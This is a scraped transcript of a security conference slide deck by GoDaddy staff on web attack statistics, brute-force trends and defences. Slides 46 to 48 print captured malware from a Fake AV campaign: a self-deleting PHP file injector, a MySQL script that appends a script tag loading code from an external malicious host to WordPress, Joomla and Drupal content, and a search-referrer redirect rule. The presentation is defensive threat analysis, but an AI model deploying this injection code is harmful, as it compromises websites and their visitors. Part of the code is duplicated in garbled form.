Presentation is loading. Please wait.

Presentation is loading. Please wait.

Keeping up with the web application security

Similar presentations


Presentation on theme: "Keeping up with the web application security"— Presentation transcript:

1 Keeping up with the web application security
Ganesh Devarajan & Todd Redfoot Keeping up with the web application security

2 Introduction Todd Redfoot Ganesh Devarajan
Chief Information Security Officer Ganesh Devarajan Sr. Security Architect With GoDaddy for the past 7 years..

3 The Background (What does Go Daddy do?)

4

5 What does Go Daddy do? 9.4 Million Customers
48 Million Domains Under Management Over 5 million Active Hosting Accounts 1/3 of all DNS queries run through our servers We register, renew or transfer more than one domain name every second

6 What does Go Daddy do? 40+ Security Professionals in Team
24 x 7 Operations Center Research Engineering Forensics Customer Security Advisors Penetration Testing User Administration Development

7

8 The Numbers (What does Go Daddy see?)

9 What do we see? Monitor over 100,000 events per second 8.6 Billion/Day
DDoS - ~900 Attacks per day / 6K per week Feb Largest 21M pps Last Week – 40G Attack Brute Force – 3.5M per hour Defense in Depth – IPS/ IDS/HIPS/DDoS Mitigation/ AV/ Custom tools Over 15 Vendors Add more stats

10 What do we see? “Other” Attacks : 425K – Invalid Directory Traversal
90K – XSS Prevention 115K – SQL Injection Prevention … all in a 24 hour period…

11 Current Trends

12 SSH Brute Forcers Top 10 Countries Overall US 3,747,586,867
CN 1,391,063,846 KR 410,861, South Korea BG AR TW FR JP CA BR

13 SSH Brute Forcers Englewood, Colorado 140 Million attempts
Top 100 locations 140 Million hits. Englewood, Colorado 140 Million attempts

14 MS-SQL Brute Forcers US 14,511,737,464 CN 5,276,229,089
TR 1,195,238,504 - turkey CA KR TH RU VN IE 58,579,068

15 MS-SQL Brute Forcers 348 Million Hits Orlando, FL 348 Million attempts

16 My-SQL Brute Forcers US 410,930,467 CN 62,659,135 CA 19,172,097
SE FR MY PH IN JP KR

17 My-SQL Brute Forcers

18 FTP Brute Forcers CN 1,841,082,597 US 724,550,747 HK 47,819,115
CA IE TW KR RS DE BR

19 FTP Brute Forcers XingPing, CN 12 Million attempts CN 1,841,082,597
US 724,550,747 HK 47,819,115 CA IE TW KR RS DE BR XingPing, CN 12 Million attempts

20 Brute Forcers - All US 19,395,137,402 CN 8,572,775,125
TR 1,239,567,167 KR CA BG TH AR TW

21 Brute Forcers - US Garden City, NY 75.7 Million attempts
CN TR KR CA BG TH AR TW Garden City, NY 75.7 Million attempts

22 Brute Forcers - CN Datong, CN 22.5 Million attempts US 19,395,137,402
TR KR CA BG TH AR TW Datong, CN 22.5 Million attempts

23 Brute Forcinator

24 SQL Injection US 38,982,921 CN 26,439,940 BG 8,421,757 - Bulgeria
UK ID NL CZ JP AU FR

25 SQL Injection Seattle, WA 1.3 Million attempts US 38,982,921
CN BG UK ID NL CZ JP AU FR Seattle, WA 1.3 Million attempts

26 Backdoor Shells US 82,794,055 ID 4,100,733 - indonesia
NG 2,059,283 - Nigeria UK CN CA DE BR NL AL

27 Backdoor Shells Phone Company (91%) Mountain View, CA
Ribbit Corporation – 91/100 came out of this network Phone Company (91%) Mountain View, CA

28 PHP Attacks US 365,310,722 KR 46,248,057 - Korea
FR 33,197,366 - France RU DE LU UK BR CA NL

29 PHP Attacks Berlin, Germany 1.9 Million attempts US 355,060,856
KR FR RU DE LU UK BR CA NL Berlin, Germany 1.9 Million attempts

30 PHP Attacks Montreal, CA 1.1 Million attempts US 355,060,856
KR FR RU DE LU UK BR CA NL Montreal, CA 1.1 Million attempts

31 Botnet C&C and bots Does not include Shadow server feeds.
US 150,662,088 UK 19,701,763 – United Kingdom KR 18,372,678 PL FR DE CA RU NL AU

32 Botnet Not sure why China isnt up there…
This does not include the Shadow server/Emerging Threat feeds…

33 Botnet Source - https://zeustracker.abuse.ch/
Not sure why China isnt up there… This does not include the Shadow server/Emerging Threat feeds… Source - https://zeustracker.abuse.ch/

34 Botnet Not sure why China isnt up there… This does not include the Shadow server/Emerging Threat feeds… Source -

35 Phishing

36 The Good, Bad and Ugly?

37 The Bad – Most Events Russian federation Proxy Moscow city
Based on all these events – where are the bad ISP’s??? 3 CN ASN’s not included This includes the overall hits.. This is the Bad List

38 The Ugly – Security Events & DDoS
ISP = Chinanet, China169 and CERNET ASN = Heavy rate limiting of these ASNs to better protect our environment.

39 New Trends

40 Recent Changes “Hacktivists” Phishing -> Spear Phishing
Lulzsec = Twitter ComodoHacker = Pastebin Phishing -> Spear Phishing Targeted & Coordinated Attacks RSA / Lockheed Martin Connection

41 What’s in the News? Executables spoofed as Images 2,226 hits in the last few days. Cameron Diaz = #2

42 More of the same… More Client-side Exploits Browser exploits
Adobe exploits Web Server Compromises Brute Force Attacks Leveraging Web Application Vulnerabilities Config files with passwords Find average days between 0 day and exploit?

43 Fake AV Scareware Reports fake viruses to users
Asks for fee to remove the threat Paying does nothing but give them your CC# $10 Million in Revenue last year Specific types of attack – Fake AV Some reports have ~$10MM in revenue last year

44 Fake AV Analysis

45 Fake AV – Attack Breakdown
Registrant: Hilary Kneber fax: 29/2 Sun street. Montey 29 Virginia NA 3947

46 Fake AV – Sample Shell $z=$_SERVER["DOCUMENT_ROOT"];
$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>'; @unlink($_SERVER['SCRIPT_FILENAME']); $val=$z; $totalinjected=0; echo "Working with $val\n!!STARTING!!"; ob_flush(); $start_time=microtime(true); if ($val!="")do_folder($val); $end_time=microtime(true)-$start_time; echo "|Injected| $totalinjected files in $end_time seconds\n"; Last line reports back to the attacker the statistics of how many files infected Random file names

47 Fake AV – DB Variant $insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>'; ... $link=mysql_connect($host,$user,$pass); if (!$link) { die('Could not connect: ' . mysql_error()); }else{ echo 'Connected successfully'."\n"; $db_list = mysql_list_dbs($link); $bases = array(); while ($row = mysql_fetch_object($db_list)) { $bases[]=$row->Database; } //wordpress if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; } //joomla if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')“; } //drupal if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2“; } if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')“; } <?php $host=$_POST["ip"]; $user=$_POST["user"]; $pass=$_POST["pass"]; $insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>'; function last_is($in,$se){ $l=strlen($se); $m=strlen($in); $k=substr($in,$m-$l); if ($k==$se)return 1; return 0; } $link=mysql_connect($host,$user,$pass); if (!$link) { die('Could not connect: ' . mysql_error()); }else{ echo 'Connected successfully'."\n"; $db_list = mysql_list_dbs($link); $bases=""; $bases = array(); while ($row = mysql_fetch_object($db_list)) { $bases[]=$row->Database; $bases_c=count($bases); for($i=0;$i<$bases_c;$i++){ echo "Working with $bases[$i]\n"; $result = mysql_list_tables($bases[$i]); if (!$result) { print "DB Error, could not list tables\n"; print 'MySQL Error: ' . mysql_error(); continue; while ($row = mysql_fetch_row($result)) { $table=$row[0]; echo "checking $table,"; $query=""; //wordpress if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; //joomla if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')"; //drupal if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2"; if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')"; if ($query!=""){ echo "Query: $query\n"; @mysql_query($query); mysql_free_result($result); echo "DONE\n"; mysql_close($link); ?> ;", "description": "... $link=mysql_connect($host,$user,$pass); if (!$link) { die( Could not connect: . mysql_error()); }else{ echo Connected successfully . \n ; $db_list = mysql_list_dbs($link); $bases = array(); while ($row = mysql_fetch_object($db_list)) { $bases[]=$row->Database; } //wordpress. if (last_is($table, _posts )){ $query= UPDATE ` .$bases[$i]. `.`$table` SET `post_content` = concat(`post_content`, $insert ) ; } //joomla. if (last_is($table, _content )){ $query= UPDATE ` .$bases[$i]. `.`$table` SET `introtext` = concat(`introtext`, $insert ) ; } //drupal. if (last_is($table, node_revisions )){ $query= UPDATE ` .$bases[$i]. `.`$table` SET `body` = concat(`body`, $insert ), format=2 ; } if (last_is($table, _post )){ $query= UPDATE ` .$bases[$i]. `.`$table` SET `title` = concat(`title`, $insert ) ; } < php. $host=$_POST[ ip ]; $user=$_POST[ user ]; $pass=$_POST[ pass ]; $insert= ; function last_is($in,$se){ $l=strlen($se); $m=strlen($in); $k=substr($in,$m-$l); if ($k==$se)return 1; return 0; } $link=mysql_connect($host,$user,$pass); if (!$link) { die( Could not connect: . mysql_error()); }else{ echo Connected successfully . \n ; $db_list = mysql_list_dbs($link); $bases= ; $bases = array(); while ($row = mysql_fetch_object($db_list)) { $bases[]=$row->Database; $bases_c=count($bases); for($i=0;$i<$bases_c;$i++){ echo Working with $bases[$i]\n ; $result = mysql_list_tables($bases[$i]); if (!$result) { print DB Error, could not list tables\n ; print MySQL Error: . mysql_error(); continue; while ($row = mysql_fetch_row($result)) { $table=$row[0]; echo checking $table, ; $query= ; //wordpress. if (last_is($table, _posts )){ $query= UPDATE ` .$bases[$i]. `.`$table` SET `post_content` = concat(`post_content`, $insert ) ; //joomla. if (last_is($table, _content )){ $query= UPDATE ` .$bases[$i]. `.`$table` SET `introtext` = concat(`introtext`, $insert ) ; //drupal. if (last_is($table, node_revisions )){ $query= UPDATE ` .$bases[$i]. `.`$table` SET `body` = concat(`body`, $insert ), format=2 ; if (last_is($table, _post )){ $query= UPDATE ` .$bases[$i]. `.`$table` SET `title` = concat(`title`, $insert ) ; if ($query!= ){ echo Query: $query\n ; @mysql_query($query); mysql_free_result($result); echo DONE\n ; mysql_close($link); >", "width": "800" }

48 Fake AV - Search Redirect
<IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* [R,L] </IfModule> addhandler x-httpd-php-cgi .php4 addhandler x-httpd-php5-cgi .php5 addhandler x-httpd-php5-cgi .php

49 Custom Monitoring He turns red Audible Alarm Txt messaging

50 UDP Flooder 2.8 million events in 24 hr

51 How to Protect?

52 Website Vulnerability Scanners
Website Protection -Site Scanner ($48/Year) Beyond Security($99.95/Year) McAfee SecureTM (~$2100/Year) WhiteHat Security® IBM AppScan® Cenzic® HP WebInspect®

53 Web Based Malware Detection
Virtual machine Honey pots Monitor Creation of new Processes, File system or Registry entries, etc. Browser Emulation Reputation Service Internet’s black list Signature Based Detection/Prevention Intrusion Detection System/Intrusion Prevention System Anti-Virus Honey Monkey , Honeyd

54 New Methodologies Regular updates of the Reputation Service Feed (to avoid deep inspection) Blocks malicious requests going to the Servers Blocks the Malicious Response coming from the Servers Blocks C&C Commands Blocks the DDoS Flood going to the Servers Based on the traffic patterns the Website scanning engine regularly checks the sites Content Sanitizer can remove the Malicious link and send the clean response.

55 Questions?

56 Thank You Ganesh Devarajan Todd Redfoot gdevarajan@godaddy.com


Download ppt "Keeping up with the web application security"

Similar presentations


Ads by Google